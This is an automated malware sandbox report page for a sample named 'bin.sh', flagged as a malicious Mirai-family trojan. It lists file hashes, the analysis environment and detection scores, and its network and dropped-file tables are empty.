flash

bin.sh

Status: finished
Submission Time: 2021-01-26 00:23:34 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    344095
  • API (Web) ID:
    590088
  • Analysis Started:
    2021-01-26 00:23:34 +01:00
  • Analysis Finished:
    2021-01-26 00:34:15 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious 100/100

malicious 40/62

malicious 19/36

malicious 19/28

malicious

IPs

IP Country Detection

Domains

Name IP Detection

URLs

Name Detection

Dropped files

Name File Type Hashes Detection